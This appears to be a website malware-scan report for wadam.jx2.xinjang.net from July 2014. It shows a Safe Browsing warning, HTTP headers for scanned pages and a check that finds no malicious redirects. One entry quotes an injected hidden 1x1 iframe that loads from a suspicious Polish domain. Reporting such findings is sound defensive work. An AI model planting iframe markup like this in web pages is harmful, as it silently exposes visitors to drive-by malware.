Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wadam.jx2.xinjang.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wadam.jx2.xinjang.net/ | HTTP/1.1 200 OK Connection: close Date: Tue, 22 Jul 2014 22:28:29 GMT Server: Microsoft-IIS/6.0 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
http://wadam.jx2.xinjang.net/do.php | 200 OK Content-Length: 25100 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://www.brenz.pl/rc/ <iframe style="height:1px" src="http://www.brenz.pl/rc/" frameborder=0 width=1> | ||
http://wadam.jx2.xinjang.net/js/index_solid.js | 200 OK Content-Length: 5057 Content-Type: application/x-javascript | clean |
http://bizakqi.com/api.php?mod=js&bid=1099 | 200 OK Content-Length: 1669 Content-Type: text/html | clean |
http://bizakqi.com/forum.php?mod=viewthread&tid=2354 | 200 OK Content-Length: 160633 Content-Type: text/html | clean |
http://bizakqi.com/static/js/bedit.js?o90 | 200 OK Content-Length: 14083 Content-Type: application/x-javascript | clean |
http://bizakqi.com/static/js/common.js?o90 | 200 OK Content-Length: 68098 Content-Type: application/x-javascript | clean |
http://bizakqi.com/static/js/forum.js?o90 | 200 OK Content-Length: 15649 Content-Type: application/x-javascript | clean |
http://bizakqi.com/static/js/forum_viewthread.js?o90 | 200 OK Content-Length: 17041 Content-Type: application/x-javascript | clean |
http://bizakqi.com/source/plugin/nurqut_mo_weibo_dzx/nurqut_mo_weibo_dzx.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://bizakqi.com/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://ad.kowruk.com/page/s.php?s=8308&w=700&h=70 | 200 OK Content-Length: 659 Content-Type: text/html | clean |
http://ad.kowruk.com/page/s.php?s=8306&w=700&h=70 | 200 OK Content-Length: 659 Content-Type: text/html | clean |
http://bizakqi.com/static/js/seditor.js?o90 | 200 OK Content-Length: 7363 Content-Type: application/x-javascript | clean |
http://s25.cnzz.com/stat.php?id=5056403&web_id=5056403&show=pic | 200 OK Content-Length: 9325 Content-Type: application/javascript | clean |
http://bizakqi.com/home.php?mod=misc&ac=sendmail&rand=1406068113 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wadam.jx2.xinjang.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Jul 2014 22:28:29 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: wadam.jx2.xinjang.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 22 Jul 2014 22:28:29 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: wadam.jx2.xinjang.net
Referer: http://www.google.com/search?q=wadam.jx2.xinjang.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wadam.jx2.xinjang.net
Referer: http://www.google.com/search?q=wadam.jx2.xinjang.net
Result:
The result is similar to the first query. There are no suspicious redirects found.